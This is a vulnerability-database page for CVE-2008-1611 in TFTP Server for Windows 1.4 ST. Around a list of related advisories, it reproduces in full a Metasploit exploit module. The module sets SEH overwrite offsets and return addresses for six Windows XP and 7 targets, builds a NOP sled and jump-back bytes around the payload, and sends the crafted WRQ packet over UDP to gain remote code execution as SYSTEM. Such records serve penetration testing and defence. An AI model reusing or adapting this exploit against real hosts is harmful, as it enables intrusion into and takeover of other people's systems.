Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TFTP Server 1.4 - ST WRQ Buffer Overflow (Metasploit)

🗓️ 20 Apr 2012 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 47 Views

TFTP Server 1.4 ST WRQ Buffer Overflow vulnerability in Metasploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		TFTP Server for Windows 1.4 ST WRQ Buffer Overflow
20 Apr 201200:00
zdt
Circl		CVE-2008-1611
26 Mar 200800:00
circl
CVE		CVE-2008-1611
1 Apr 200816:00
cve
Cvelist		CVE-2008-1611
1 Apr 200816:00
cvelist
Metasploit		TFTP Server for Windows 1.4 ST WRQ Buffer Overflow
20 Apr 201202:17
metasploit
NVD		CVE-2008-1611
1 Apr 200816:44
nvd
OpenVAS		OpenTFTP Server Read Request Buffer Overflow Vulnerability
12 Jan 201200:00
openvas
Packet Storm		TFTP Server for Windows 1.4 ST WRQ Buffer Overflow
20 Apr 201200:00
packetstorm
Prion		Stack overflow
1 Apr 200816:44
prion
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	Rank = NormalRanking
	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'            => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
			'Description'     => %q{
					This module exploits a vulnerability found in TFTP Server 1.4 ST.  The flaw
				is due to the way TFTP handles the filename parameter extracted from a WRQ request.
				The server will append the user-supplied filename to TFTP server binary's path
				without any bounds checking, and then attempt to open this with a fopen(). Since
				this isn't a valid file path, fopen() returns null, which allows the corrupted
				data to be used in a strcmp() function, causing an access violation.

				Since the offset is sensitive to how the TFTP server is launched, you must know
				in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'
				, and then manually select your target accordingly. A successful attempt will lead
				to remote code execution under the context of SYSTEM if run as a service, or
				the user if run as a standalone. A failed attempt will result a denial-of-service.
			},
			'Author'          =>
				[
					'Mati Aharoni', #Initial discovery, PoC
					'Datacut'       #Metasploit
				],
			'References'      =>
				[
					[ 'CVE', '2008-1611' ],
					[ 'OSVDB', '43785' ],
					[ 'BID', '18345' ],
					[ 'EDB', '5314' ]
				],
			'DefaultOptions'  =>
				{
					'EXITFUNC' =>'seh',
				},
			'Payload'         =>
				{
					'Space'           => 600,
					'BadChars'        => "\x00\x2f",
					'StackAdjustment' => -3500
				},
			'Platform'        => 'win',
			'Targets'         =>
				[
					# datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.
					# possible may work for other service packs and or vista
					# Rets = P/P/R from tftpserversp.exe
					[ 'Windows XP SP2/SP3 EN Service Mode',       { 'Ret' => 0x416801 , 'Offset' => 1203} ],
					[ 'Windows XP SP2/SP3 EN Standalone Mode',    { 'Ret' => 0x416801 , 'Offset' => 1487} ],
					[ 'Windows 7 SP0/SP1 EN x64 Service Mode',    { 'Ret' => 0x416801 , 'Offset' => 1217} ],
					[ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ],
					[ 'Windows 7 SP0/SP1 EN x86 Service Mode',    { 'Ret' => 0x416801 , 'Offset' => 1223} ],
					[ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ]
				],
			'Privileged'	=> false,
			'DisclosureDate'=> 'Mar 26 2008',
			'DefaultTarget' => 4))  #TFTP is installed as a service

		register_options(
			[
				Opt::RPORT(69)
			], self.class)
	end


	def exploit
		connect_udp

		nops = make_nops(50)
		lead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)
		near = "\xe9\x80\xfd\xff\xff"    #jump back 640 bytes to the nop sled
		nseh = "\xeb\xf9" + make_nops(2) #jump back 7 bytes to the long jump

		evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
		mode = "netascii"

		#Send the WRQ packet (header "\x00\x02")
		sploit = "\x00\x02" + evil + "\0" + mode +"\0"

		udp_sock.put(sploit)

		handler
		disconnect_udp
	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Apr 2012 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.8243
metasploittftp serverbuffer overflowvulnerabilityremote code executionsystem access
47